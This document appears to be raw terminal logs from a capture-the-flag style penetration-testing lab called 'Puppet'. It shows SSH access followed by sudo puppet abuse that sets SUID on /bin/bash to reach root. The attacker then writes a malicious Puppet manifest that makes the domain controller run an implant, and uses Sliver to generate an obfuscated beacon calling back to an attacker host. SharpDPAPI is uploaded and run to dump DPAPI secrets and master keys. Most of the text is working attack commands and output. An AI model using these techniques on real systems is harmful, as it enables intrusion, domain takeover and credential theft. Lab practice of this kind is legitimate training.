debug3: kex_input_ext_info: extension server-sig-algs
debug1: kex_ext_info_client_parse: server-sig-algs=<ssh-ed25519,sk-ssh-ed25519@openssh.com,ssh-rsa,rsa-sha2-256,rsa-sha2-512,ssh-dss,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ecdsa-sha2-nistp256@openssh.com,webauthn-sk-ecdsa-sha2-nistp256@openssh.com>
debug3: kex_input_ext_info: extension publickey-hostbound@openssh.com
debug1: kex_ext_info_check_ver: publickey-hostbound@openssh.com=<0>
debug3: receive packet: type 6
debug2: service_accept: ssh-userauth
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug3: send packet: type 50
debug3: receive packet: type 51
debug1: Authentications that can continue: publickey,password
debug3: start over, passed a different list publickey,password
debug3: preferred publickey
debug3: authmethod_lookup publickey
debug3: remaining preferred:
debug3: authmethod_is_enabled publickey
debug1: Next authentication method: publickey
debug3: ssh_get_authentication_socket_path: path '/run/user/1000/gcr/ssh'
debug1: get_agent_identities: bound agent to hostkey
debug1: get_agent_identities: ssh_fetch_identitylist: agent contains no identities
debug1: Will attempt key: ./ed25519 ED25519 SHA256:MRGg+7Yuv9V3iIge9zYv+Z2Vf/pn4UIe4QnJNvEFSGw explicit
debug2: pubkey_prepare: done
debug1: Offering public key: ./ed25519 ED25519 SHA256:MRGg+7Yuv9V3iIge9zYv+Z2Vf/pn4UIe4QnJNvEFSGw explicit
debug3: send packet: type 50
debug2: we sent a publickey packet, wait for reply
debug3: receive packet: type 60
debug1: Server accepts key: ./ed25519 ED25519 SHA256:MRGg+7Yuv9V3iIge9zYv+Z2Vf/pn4UIe4QnJNvEFSGw explicit
debug3: sign_and_send_pubkey: using publickey-hostbound-v00@openssh.com with ED25519 SHA256:MRGg+7Yuv9V3iIge9zYv+Z2Vf/pn4UIe4QnJNvEFSGw
debug3: sign_and_send_pubkey: signing using ssh-ed25519 SHA256:MRGg+7Yuv9V3iIge9zYv+Z2Vf/pn4UIe4QnJNvEFSGw
Enter passphrase for key './ed25519':
debug3: send packet: type 50
debug3: receive packet: type 52
Authenticated to 127.0.0.1 ([127.0.0.1]:2222) using "publickey".
debug1: channel 0: new session [client-session] (inactive timeout: 0)
debug3: ssh_session2_open: channel_new: 0 (tty)
debug2: channel 0: send open
debug3: send packet: type 90
debug1: Requesting no-more-sessions@openssh.com
debug3: send packet: type 80
debug1: Entering interactive session.
debug1: pledge: filesystem
debug3: client_repledge: enter
debug2: client_loop: session QoS is now interactive
debug2: fd 3 setting TCP_NODELAY
debug3: set_sock_tos: set socket 3 IP_TOS 0xb8
debug3: receive packet: type 80
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug3: client_input_hostkeys: received RSA key SHA256:lZEMFt4la6pkZ7TtooR38VMRL0cMfRqReuG2S1MVVZc
debug3: client_input_hostkeys: received ECDSA key SHA256:jX8JLcN2a7gSzMZ9JuizCgsZcCBrl9UhQ6KxLPx2yBU
debug3: client_input_hostkeys: received ED25519 key SHA256:i9tMA6FNxAdTs8Lzmp6yEKKJG6Hndq4/JLGf05lOBMs
debug3: put_host_port: [127.0.0.1]:2222
debug1: client_input_hostkeys: searching /home/neo/.ssh/known_hosts for [127.0.0.1]:2222 / (none)
debug3: hostkeys_foreach: reading file "/home/neo/.ssh/known_hosts"
debug3: hostkeys_find: found ssh-ed25519 key under different name/addr at /home/neo/.ssh/known_hosts:1
debug3: hostkeys_find: found ssh-ed25519 key at /home/neo/.ssh/known_hosts:2
debug1: client_input_hostkeys: searching /home/neo/.ssh/known_hosts2 for [127.0.0.1]:2222 / (none)
debug1: client_input_hostkeys: hostkeys file /home/neo/.ssh/known_hosts2 does not exist
debug3: client_input_hostkeys: 3 server keys: 2 new, 18446744073709551615 retained, 2 incomplete match. 0 to remove
debug1: client_input_hostkeys: host key found matching a different name/address, skipping UserKnownHostsFile update
debug3: client_repledge: enter
debug3: receive packet: type 4
debug1: Remote: /home/svc_puppet_lin_t1@puppet.vl/.ssh/authorized_keys:1: key options: agent-forwarding port-forwarding pty user-rc x11-forwarding
debug3: receive packet: type 4
debug1: Remote: /home/svc_puppet_lin_t1@puppet.vl/.ssh/authorized_keys:1: key options: agent-forwarding port-forwarding pty user-rc x11-forwarding
debug3: receive packet: type 91
debug2: channel_input_open_confirmation: channel 0: callback start
debug2: client_session2_setup: id 0
debug2: channel 0: request pty-req confirm 1
debug3: send packet: type 98
debug1: Sending environment.
debug3: Ignored env SHELL
debug3: Ignored env QT_ACCESSIBILITY
debug3: Ignored env POWERSHELL_UPDATECHECK
debug3: Ignored env I3SOCK
debug3: Ignored env POWERSHELL_TELEMETRY_OPTOUT
debug3: Ignored env SSH_AUTH_SOCK
debug3: Ignored env DOTNET_CLI_TELEMETRY_OPTOUT
debug3: Ignored env DESKTOP_SESSION
debug3: Ignored env XCURSOR_SIZE
debug3: Ignored env XDG_SEAT
debug3: Ignored env PWD
debug3: Ignored env XDG_SESSION_DESKTOP
debug3: Ignored env LOGNAME
debug3: Ignored env XDG_SESSION_TYPE
debug3: Ignored env GPG_AGENT_INFO
debug3: Ignored env COMMAND_NOT_FOUND_INSTALL_PROMPT
debug3: Ignored env GDM_LANG
debug3: Ignored env HOME
debug3: Ignored env USERNAME
debug1: channel 0: setting env LANG = "en_US.UTF-8"
debug2: channel 0: request env confirm 0
debug3: send packet: type 98
debug3: Ignored env XDG_CURRENT_DESKTOP
debug3: Ignored env SWAYSOCK
debug3: Ignored env WAYLAND_DISPLAY
debug3: Ignored env XDG_SESSION_CLASS
debug3: Ignored env USER
debug3: Ignored env DISPLAY
debug3: Ignored env SHLVL
debug3: Ignored env XDG_VTNR
debug3: Ignored env XDG_SESSION_ID
debug3: Ignored env XDG_RUNTIME_DIR
debug3: Ignored env PATH
debug3: Ignored env GDMSESSION
debug3: Ignored env XDG_SESSION_EXTRA_DEVICE_ACCESS
debug3: Ignored env DBUS_SESSION_BUS_ADDRESS
debug3: Ignored env TERM
debug1: channel 0: setting env COLORTERM = "truecolor"
debug2: channel 0: request env confirm 0
debug3: send packet: type 98
debug3: Ignored env OLDPWD
debug3: Ignored env LS_COLORS
debug3: Ignored env LESS_TERMCAP_mb
debug3: Ignored env LESS_TERMCAP_md
debug3: Ignored env LESS_TERMCAP_me
debug3: Ignored env LESS_TERMCAP_so
debug3: Ignored env LESS_TERMCAP_se
debug3: Ignored env LESS_TERMCAP_us
debug3: Ignored env LESS_TERMCAP_ue
debug3: Ignored env MANROFFOPT
debug3: Ignored env EDITOR
debug3: Ignored env VISUAL
debug3: Ignored env INPUTRC
debug3: Ignored env _
debug2: channel 0: request shell confirm 1
debug3: send packet: type 98
debug2: channel_set_xtype: labeled channel 0 as session:shell (inactive timeout 0)
debug3: client_repledge: enter
debug1: pledge: fork
debug2: channel_input_open_confirmation: channel 0: callback done
debug2: channel 0: open confirm rwindow 0 rmax 32768
debug3: receive packet: type 99
debug2: channel_input_status_confirm: type 99 id 0
debug2: PTY allocation request accepted on channel 0
debug2: channel 0: rcvd adjust 2097152
debug3: receive packet: type 99
debug2: channel_input_status_confirm: type 99 id 0
debug2: shell request accepted on channel 0
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-138-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Thu Oct 1 03:04:27 AM UTC 2026
System load: 0.0
Usage of /: 73.5% of 9.75GB
Memory usage: 9%
Swap usage: 0%
Processes: 159
Users logged in: 0
IPv4 address for eth0: 10.13.38.33
IPv6 address for eth0: dead:beef::a0de:adff:fe11:c1d4
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sat Oct 12 18:18:52 2024 from 10.8.0.101
svc_puppet_lin_t1@puppet.vl@puppet:~$ debug3: obfuscate_keystroke_timing: starting: interval ~20ms
ls
svc_puppet_lin_t1@puppet.vl@puppet:~$ ls
svc_puppet_lin_t1@puppet.vl@puppet:~$ pwd
/home/svc_puppet_lin_t1@puppet.vl
svc_puppet_lin_t1@puppet.vl@puppet:~$ debug3: obfuscate_keystroke_timing: stopping: chaff time expired (0 chaff packets sent)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
…/prolab/Puppet ✗ ssh -o PreferredAuthentications=publickey \
-o PasswordAuthentication=no \
-o IdentitiesOnly=yes \
-i ./ed25519 \
-p 2222 \
-l 'svc_puppet_lin_t1@puppet.vl' \
127.0.0.1
Enter passphrase for key './ed25519':
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-138-generic x86_64)
System information as of Thu Oct 1 03:07:06 AM UTC 2026
System load: 0.08
Usage of /: 73.5% of 9.75GB
Memory usage: 9%
Swap usage: 0%
Processes: 158
Users logged in: 0
IPv4 address for eth0: 10.13.38.33
IPv6 address for eth0: dead:beef::a0de:adff:fe11:c1d4
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Oct 1 03:04:28 2026 from 172.16.40.50
svc_puppet_lin_t1@puppet.vl@puppet:~$
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
svc_puppet_lin_t1@puppet.vl@puppet:~$ pwd
/home/svc_puppet_lin_t1@puppet.vl
svc_puppet_lin_t1@puppet.vl@puppet:~$ ls -ls
total 0
svc_puppet_lin_t1@puppet.vl@puppet:~$ whoami
pwd
hostname
svc_puppet_lin_t1@puppet.vl
/home/svc_puppet_lin_t1@puppet.vl
puppet.puppet.vl
svc_puppet_lin_t1@puppet.vl@puppet:~$ cd ..
svc_puppet_lin_t1@puppet.vl@puppet:/home$ ls
localadm sliver svc_puppet_lin_t1@puppet.vl
svc_puppet_lin_t1@puppet.vl@puppet:/home$ cd sliver/
-bash: cd: sliver/: Permission denied
svc_puppet_lin_t1@puppet.vl@puppet:/home$ sudo -l
sudo: unable to resolve host puppet.puppet.vl: Temporary failure in name resolution
Matching Defaults entries for svc_puppet_lin_t1@puppet.vl on puppet:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User svc_puppet_lin_t1@puppet.vl may run the following commands on puppet:
(ALL) NOPASSWD: /usr/bin/puppet
svc_puppet_lin_t1@puppet.vl@puppet:/home$ sudo puppet apply -e "exec { '/bin/sh -c \"chmod u+s /bin/bash\"': }"
bash -p
sudo: unable to resolve host puppet.puppet.vl: Temporary failure in name resolution
bash -p
Notice: Compiled catalog for puppet.puppet.vl in environment production in 0.03 seconds
Notice: /Stage[main]/Main/Exec[/bin/sh -c "chmod u+s /bin/bash"]/returns: executed successfully
Notice: Applied catalog in 0.02 seconds
svc_puppet_lin_t1@puppet.vl@puppet:/home$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1396520 Mar 14 2024 /bin/bash
svc_puppet_lin_t1@puppet.vl@puppet:/home$ /bin/bash -p
bash-5.1# id
uid=451001132(svc_puppet_lin_t1@puppet.vl) gid=451000513(domain users@puppet.vl) euid=0(root) groups=451000513(domain users@puppet.vl),451001133(admins_t1@puppet.vl)
bash-5.1#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
bash-5.1# cat /root/flag.txt
PUPPET{c093652c9a73eaee0b43e039a04eff77}
bash-5.1# mkdir -p /etc/puppet/code/environments/production/manifests
bash-5.1# cat > /etc/puppet/code/environments/production/manifests/site.pp <<'EOF'
node 'dc01.puppet.vl' {
exec { 'pwned':
command => 'C:\\Windows\\System32\\cmd.exe /c \\\\file01.puppet.vl\\files\\update.exe',
logoutput => true,
}
}
node default {
notify { 'This is the default node': }
}
EOF
bash-5.1# puppet parser validate /etc/puppet/code/environments/production/manifests/site.pp
bash-5.1# cat /etc/puppet/code/environments/production/manifests/site.pp
node 'dc01.puppet.vl' {
exec { 'pwned':
command => 'C:\\Windows\\System32\\cmd.exe /c \\\\file01.puppet.vl\\files\\update.exe',
logoutput => true,
}
}
node default {
notify { 'This is the default node': }
}
bash-5.1# tail -f /var/log/puppetlabs/puppet/puppet.log
tail: cannot open '/var/log/puppetlabs/puppet/puppet.log' for reading: No such file or directory
tail: no files remaining
bash-5.1# bash-5.1# cat /root/flag.txt
PUPPET{c093652c9a73eaee0b43e039a04eff77}
bash-5.1# mkdir -p /etc/puppet/code/environments/production/manifests
bash-5.1# cat > /etc/puppet/code/environments/production/manifests/site.pp <<'EOF'
node 'dc01.puppet.vl' {
exec { 'pwned':
command => 'C:\\Windows\\System32\\cmd.exe /c \\\\file01.puppet.vl\\files\\update.exe',
logoutput => true,
}
}
bash-5.1#
https://github.com/Flangvik/SharpCollection
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
sliver (BLUSHING_ERROR) > sessions
ID Transport Remote Address Hostname Username Operating System Health
========== =========== ==================== ========== ========================== ================== =========
07f7ec30 mtls 172.16.40.50:49980 File01 PUPPET\svc_puppet_win_t1 windows/amd64 [ALIVE]
59586395 mtls 172.16.40.50:49949 File01 NT AUTHORITY\SYSTEM windows/amd64 [ALIVE]
7c1d4410 mtls 172.16.40.50:49786 File01 PUPPET\bruce.smith windows/amd64 [ALIVE]
8d46fa29 mtls 172.16.40.50:49904 File01 <err> windows/amd64 [ALIVE]
97ca4651 mtls 172.16.40.50:49903 File01 <err> windows/amd64 [ALIVE]
b3c5c744 mtls 172.16.40.50:49787 File01 PUPPET\bruce.smith windows/amd64 [ALIVE]
ba34b47a mtls 172.16.40.50:49979 File01 PUPPET\svc_puppet_win_t1 windows/amd64 [ALIVE]
c0ccf210 mtls 172.16.40.50:49785 File01 PUPPET\bruce.smith windows/amd64 [ALIVE]
sliver (BLUSHING_ERROR) > use 07f7ec30-3880-4566-aed4-59e377dd5cd0
[*] Active session BLUSHING_ERROR (07f7ec30-3880-4566-aed4-59e377dd5cd0)
sliver (BLUSHING_ERROR) > execute -o -- arp -a
sliver (BLUSHING_ERROR) > upload /home/neo/tools/SharpCollection/NetFramework_4.7_x64/SharpDPAPI.exe c:\users\public\SharpDPAPI.exe
[*] Wrote file to C:\Windows\system32\userspublicSharpDPAPI.exe
sliver (BLUSHING_ERROR) >
sliver (BLUSHING_ERROR) > execute -o -- "c:\users\public\SharpDPAPI.exe" machinetriage
[!] rpc error: code = Unknown desc = exec: "c:\\users\\public\\SharpDPAPI.exe": file does not exist
sliver (BLUSHING_ERROR) > upload /home/neo/tools/SharpCollection/NetFramework_4.7_x64/SharpDPAPI.exe C:/Users/Public/SharpDPAPI.exe
[*] Wrote file to C:\Users\Public\SharpDPAPI.exe
sliver (BLUSHING_ERROR) > execute -o -- powershell.exe -NoProfile -Command "Get-Item 'C:\Users\Public\SharpDPAPI.exe' | Select-Object FullName,Length"
⠋ Executing powershell.exe -NoProfile -Command Get-Item 'C:\Users\Public\SharpDPAPI.exe' | Select-Object FullNa ⠙ Executing powershell.exe -NoProfile -Command Get-Item 'C:\Users\Public\SharpDPAPI.exe' | Select-Object FullNa ⠹ Executing powershell.exe -NoProfile -Command Get-Item 'C:\Users\Public\SharpDPAPI.exe' | Select-Object FullNa ⠸ Executing powershell.exe -NoProfile -Command Get-Item 'C:\Users\Public\SharpDPAPI.exe' | Select-Object FullNa ⠼ Executing powershell.exe -NoProfile -Command Get-Item 'C:\Users\Public\SharpDPAPI.exe' | Select-Object FullNa ⠴ Executing powershell.exe -NoProfile -Command Get-Item 'C:\Users\Public\SharpDPAPI.exe' | Select-Object FullNa[*] Output:
FullName Length
-------- ------
C:\Users\Public\SharpDPAPI.exe 155136
ID Name Transport Hostname Username Operating System Last Check-In Next Check-In
========== ================ =========== ========== ========================== ================== =============== ===============
77d51b91 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 29s 52s
27bd2d30 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 1m13s 11s
4c206bf9 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 58s 24s
dc86af3a BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 22s 1m4s
b9247898 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 1m11s 5s
1e9d0f42 BLUSHING_ERROR mtls File01 <err> windows/amd64 44s 27s
71cf3aa8 BLUSHING_ERROR mtls File01 NT AUTHORITY\SYSTEM windows/amd64 56s 26s
c4a78200 BLUSHING_ERROR mtls File01 NT AUTHORITY\SYSTEM windows/amd64 51s 18s
072cf2a4 BLUSHING_ERROR mtls File01 NT AUTHORITY\SYSTEM windows/amd64 1s 1m28s
dc60aeba BLUSHING_ERROR mtls File01 PUPPET\svc_puppet_win_t1 windows/amd64 31s 30s
sliver (BLUSHING_ERROR) > generate beacon --mtls 172.16.40.200:8443 --os windows --arch amd64 --save /tmp/update.exe
[*] Generating new windows/amd64 beacon implant binary (1m0s)
[*] Symbol obfuscation is enabled
[*] Build completed in 2m34s
[*] Implant saved to /tmp/update.exe
ID Name Transport Hostname Username Operating System Last Check-In Next Check-In
========== ================ =========== ========== ========================== ================== =============== ===============
77d51b91 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 18s 57s
27bd2d30 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 5s 1m3s
4c206bf9 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 25s 53s
dc86af3a BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 57s 21s
b9247898 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 55s 29s
1e9d0f42 BLUSHING_ERROR mtls File01 <err> windows/amd64 1m8s 18s
71cf3aa8 BLUSHING_ERROR mtls File01 NT AUTHORITY\SYSTEM windows/amd64 42s 23s
c4a78200 BLUSHING_ERROR mtls File01 NT AUTHORITY\SYSTEM windows/amd64 33s 29s
072cf2a4 BLUSHING_ERROR mtls File01 NT AUTHORITY\SYSTEM windows/amd64 33s 51s
dc60aeba BLUSHING_ERROR mtls File01 PUPPET\svc_puppet_win_t1 windows/amd64 54s 6s
sliver (BLUSHING_ERROR) > use dc60aeba
[*] Active beacon BLUSHING_ERROR (dc60aeba-a349-4cfd-82de-5c04fcadf299)
sliver (BLUSHING_ERROR) > upload /tmp/update.exe //file01.puppet.vl/files/update.exe
[*] Tasked beacon BLUSHING_ERROR (31962af7)
sliver (BLUSHING_ERROR) > execute -o -- powershell.exe -NoProfile -Command "Test-Path '\\file01.puppet.vl\files\update.exe'"
⚠️ Using --output in beacon mode, if the command blocks the task will never complete
[*] Tasked beacon BLUSHING_ERROR (54200600)
ID State Message Type Created Sent Completed
========== =========== ============== =============================== =============================== ===============================
54200600 pending Execute Wed, 30 Sep 2026 23:48:08 EDT
31962af7 pending Upload Wed, 30 Sep 2026 23:48:01 EDT
f77ee7c1 completed OpenSession Wed, 30 Sep 2026 22:56:55 EDT Wed, 30 Sep 2026 22:57:18 EDT Wed, 30 Sep 2026 22:57:18 EDT
e3170d85 completed OpenSession Wed, 30 Sep 2026 22:56:30 EDT Wed, 30 Sep 2026 22:57:18 EDT Wed, 30 Sep 2026 22:57:18 EDT
ID Name Transport Hostname Username Operating System Last Check-In Next Check-In
========== ================ =========== ========== ========================== ================== =============== ===============
77d51b91 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 46s 18s
27bd2d30 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 42s 30s
4c206bf9 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 42s 44s
dc86af3a BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 40s 30s
b9247898 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 1m24s 17s
1e9d0f42 BLUSHING_ERROR mtls File01 <err> windows/amd64 4s 1m25s
71cf3aa8 BLUSHING_ERROR mtls File01 NT AUTHORITY\SYSTEM windows/amd64 2s 59s
c4a78200 BLUSHING_ERROR mtls File01 NT AUTHORITY\SYSTEM windows/amd64 1m17s 1s
072cf2a4 BLUSHING_ERROR mtls File01 NT AUTHORITY\SYSTEM windows/amd64 1m1s 11s
dc60aeba BLUSHING_ERROR mtls File01 PUPPET\svc_puppet_win_t1 windows/amd64 1m17s 5s
[+] BLUSHING_ERROR completed task 31962af7
[*] Wrote file to \\file01.puppet.vl\files\update.exe
[+] BLUSHING_ERROR completed task 54200600
[*] Output:
False
ID Name Transport Hostname Username Operating System Last Check-In Next Check-In
========== ================ =========== ========== ========================== ================== =============== ===============
77d51b91 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 1m8s 4s
27bd2d30 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 1m4s 8s
4c206bf9 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 1s 1m10s
dc86af3a BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 1m2s 8s
b9247898 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 19s 1m10s
1e9d0f42 BLUSHING_ERROR mtls File01 <err> windows/amd64 26s 1m3s
71cf3aa8 BLUSHING_ERROR mtls File01 NT AUTHORITY\SYSTEM windows/amd64 24s 37s
c4a78200 BLUSHING_ERROR mtls File01 NT AUTHORITY\SYSTEM windows/amd64 20s 49s
072cf2a4 BLUSHING_ERROR mtls File01 NT AUTHORITY\SYSTEM windows/amd64 0s 1m3s
dc60aeba BLUSHING_ERROR mtls File01 PUPPET\svc_puppet_win_t1 windows/amd64 8s 8s
[*] Beacon 4a4a3013 THUNDERING_BODY - 172.16.40.5:51156 (DC01) - windows/amd64 - Wed, 30 Sep 2026 23:49:49 EDT
sliver (BLUSHING_ERROR) > execute -o -- powershell.exe -NoProfile -Command "Get-ChildItem '\\file01.puppet.vl\files' -Force | Select-Object Name,Length,FullName"
⠋ Executing powershell.exe -NoProfile -Command Get-ChildItem '\file01.puppet.vl\files' -Force | Select-Object N[*] Tasked beacon BLUSHING_ERROR (2c7d5f9b)
ID Name Transport Hostname Username Operating System Last Check-In Next Check-In
========== ================= =========== ========== ========================== ================== =============== ===============
77d51b91 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 49s 33s
27bd2d30 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 47s 30s
4c206bf9 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 3s 1m10s
dc86af3a BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 1m0s 5s
b9247898 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 1m23s 6s
1e9d0f42 BLUSHING_ERROR mtls File01 <err> windows/amd64 25s 1m2s
71cf3aa8 BLUSHING_ERROR mtls File01 NT AUTHORITY\SYSTEM windows/amd64 26s 36s
c4a78200 BLUSHING_ERROR mtls File01 NT AUTHORITY\SYSTEM windows/amd64 1s 1m17s
072cf2a4 BLUSHING_ERROR mtls File01 NT AUTHORITY\SYSTEM windows/amd64 1m4s 1s
dc60aeba BLUSHING_ERROR mtls File01 PUPPET\svc_puppet_win_t1 windows/amd64 1m12s 1m12s
4a4a3013 THUNDERING_BODY mtls DC01 PUPPET\svc_puppet_win_t0 windows/amd64 42s 39s
[+] BLUSHING_ERROR completed task 2c7d5f9b
[*] Output:
[*] Stderr:
Get-ChildItem : Cannot find path 'C:\file01.puppet.vl\files' because it does not exist.
At line:1 char:1
+ Get-ChildItem '\file01.puppet.vl\files' -Force | Select-Object Name,L ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\file01.puppet.vl\files:String) [Get-ChildItem],
ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
[!] Exited with status 1!
```jsx
sliver > beacons
ID Name Transport Hostname Username Operating System Last Check-In Next Check-In
========== ================= =========== ========== ========================== ================== =============== ===============
77d51b91 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 1m1s 19s
27bd2d30 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 2s 1m1s
4c206bf9 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 28s 59s
dc86af3a BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 48s 23s
b9247898 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 13s 51s
1e9d0f42 BLUSHING_ERROR mtls File01 <err> windows/amd64 43s 17s
71cf3aa8 BLUSHING_ERROR mtls File01 NT AUTHORITY\SYSTEM windows/amd64 1m10s 18s
c4a78200 BLUSHING_ERROR mtls File01 NT AUTHORITY\SYSTEM windows/amd64 1m15s 5s
072cf2a4 BLUSHING_ERROR mtls File01 NT AUTHORITY\SYSTEM windows/amd64 2s 1m11s
dc60aeba BLUSHING_ERROR mtls File01 PUPPET\svc_puppet_win_t1 windows/amd64 1m9s 1s
4a4a3013 THUNDERING_BODY mtls DC01 PUPPET\svc_puppet_win_t0 windows/amd64 18s 47s
ad7b3595 THUNDERING_BODY mtls DC01 PUPPET\svc_puppet_win_t0 windows/amd64 1m0s 29s
53447682 THUNDERING_BODY mtls DC01 PUPPET\svc_puppet_win_t0 windows/amd64 42s 29s
d9c9111e THUNDERING_BODY mtls DC01 PUPPET\svc_puppet_win_t0 windows/amd64 45s 30s
sliver > use d9c9111e-86e4-4d33-a873-eacfba6f7fa1
[*] Active beacon THUNDERING_BODY (d9c9111e-86e4-4d33-a873-eacfba6f7fa1)
sliver (THUNDERING_BODY) > sessions
ID Transport Remote Address Hostname Username Operating System Health
========== =========== ==================== ========== ========================== ================== =========
07f7ec30 mtls 172.16.40.50:49980 File01 PUPPET\svc_puppet_win_t1 windows/amd64 [ALIVE]
2d3aeb0d mtls 172.16.40.5:51173 DC01 PUPPET\svc_puppet_win_t0 windows/amd64 [ALIVE]
59586395 mtls 172.16.40.50:49949 File01 NT AUTHORITY\SYSTEM windows/amd64 [ALIVE]
7c1d4410 mtls 172.16.40.50:49786 File01 PUPPET\bruce.smith windows/amd64 [ALIVE]
8d46fa29 mtls 172.16.40.50:49904 File01 <err> windows/amd64 [ALIVE]
97ca4651 mtls 172.16.40.50:49903 File01 <err> windows/amd64 [ALIVE]
b3c5c744 mtls 172.16.40.50:49787 File01 PUPPET\bruce.smith windows/amd64 [ALIVE]
ba34b47a mtls 172.16.40.50:49979 File01 PUPPET\svc_puppet_win_t1 windows/amd64 [ALIVE]
c0ccf210 mtls 172.16.40.50:49785 File01 PUPPET\bruce.smith windows/amd64 [ALIVE]
ea7ff717 mtls 172.16.40.5:51245 DC01 PUPPET\svc_puppet_win_t0 windows/amd64 [ALIVE]
sliver (THUNDERING_BODY) > use ea7ff717-f8f8-4a53-8fbc-a9f909806d4e
[*] Active session THUNDERING_BODY (ea7ff717-f8f8-4a53-8fbc-a9f909806d4e)
sliver (THUNDERING_BODY) > upload /home/neo/tools/SharpCollection/NetFramework_4.7_x64/SharpDPAPI.exe c:\users\public\SharpDPAPI.exe
sliver (THUNDERING_BODY) > execute -o -- "C:\Windows\system32\userspublicSharpDPAPI.exe" machinetriage
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.12.0
[*] Action: Machine DPAPI Credential, Vault, and Certificate Triage
[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()
[*] Secret : DPAPI_SYSTEM
[*] full: F55461801C15D867EA56A3BF183977FA6301E601CD30040C9B9008515A1855D614A6831EF1986886
[*] m/u : F55461801C15D867EA56A3BF183977FA6301E601 / CD30040C9B9008515A1855D614A6831EF1986886
[*] SYSTEM master key cache:
{154c35ab-34b7-4919-ad12-9f75c53de887}:8C681F5144105BF6DB9972A205EBF03899204666
{16ce0746-d7db-4885-9b77-d1418640bfce}:0779112B7A1588F460A7A55723A2D508169C447F
{1762fb49-daaa-41a5-b777-67d3ceae8f8d}:0C4B09075E42E044C01E8FF01A704F8C9802C989
